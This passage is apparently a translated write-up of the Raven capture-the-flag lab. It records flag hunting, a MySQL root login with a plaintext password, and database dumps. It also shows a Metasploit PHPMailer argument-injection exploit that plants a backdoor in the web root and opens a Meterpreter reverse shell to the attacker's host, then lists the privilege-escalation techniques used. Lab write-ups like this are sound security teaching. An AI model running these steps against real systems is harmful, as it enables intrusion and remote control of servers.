/usr/share/doc/apache2-doc/manual/zh-cn/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/de/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/es/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/da/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/pt-br/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/fr/rewrite/flags.html
/usr/share/doc/apache2-doc/manual/en/rewrite/flags.html
/sys/devices/pci0000:00/0000:00:11.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags

Still only two flag files found

/var/www/flag2.txt
/root/flag4.txt

Keep looking for the remaining two flags

Directory scanning turned up the URL below

http://192.168.56.118/service.html

Right-click, view the page source, and there is the flag

<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

One flag left; connect to the database again and search for it there

root@Raven:~# mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_posts;
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| ID | post_author | post_date | post_date_gmt | post_content | post_title | post_excerpt | post_status | comment_status | ping_status | post_password | post_name | to_ping | pinged | post_modified | post_modified_gmt | post_content_filtered | post_parent | guid | menu_order | post_type | post_mime_type | comment_count |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| 1 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing! | Hello world! | | publish | open | open | | hello-world | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?p=1 | 0 | post | | 1 |
| 2 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

<blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote>

...or something like this:

<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>

As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page | | publish | closed | open | | sample-page | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?page_id=2 | 0 | page | | 0 |
| 4 | 1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | draft | open | open | | | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 0 | http://raven.local/wordpress/?p=4 | 0 | post | | 0 |
| 5 | 1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce} | flag4 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | | 4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ | 0 | revision | | 0 |
| 7 | 2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ | 0 | revision | | 0 |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
5 rows in set (0.00 sec)

The last flag, flag3, finally found

flag3{afc01ab56b50591e7dccf93122770cd2}

Getting a shell with msf

msf5 exploit(multi/http/phpmailer_arg_injection) > show options

Module options (exploit/multi/http/phpmailer_arg_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.118 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /contact.php yes Path to the application root
TRIGGERURI / no Path to the uploaded payload
VHOST no HTTP server virtual host
WEB_ROOT /var/www/html yes Path to the web root


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.102 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 PHPMailer <5.2.18


msf5 exploit(multi/http/phpmailer_arg_injection) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Writing the backdoor to /var/www/html/XTXxkX1w.php
[*] Sleeping before requesting the payload from: /XTXxkX1w.php
[*] Waiting for up to 300 seconds to trigger the payload
[*] Sending stage (38288 bytes) to 192.168.56.118
[*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.118:34607) at 2020-02-14 08:02:30 -0500
[+] Deleted /var/www/html/XTXxkX1w.php
[+] Successfully triggered the payload

meterpreter > sysinfo
Computer : Raven
OS : Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64
Meterpreter : php/linux
meterpreter > shell
Process 17423 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
ls
Security - Doc
about.html
contact.php
contact.zip
css
elements.html
fonts
img
index.html
js
scss
service.html
team.html
vendor
wordpress

Summary of key points

  • PHPMailer vulnerability to get a shell
  • WordPress username disclosure
  • MySQL UDF privilege escalation
  • Python sudo privilege escalation

Game over

Sorry, this time I still have not found that Greek master's idiot-proof one-click clear script, i am so sorry about this…It's a pity…

The end, to be continued…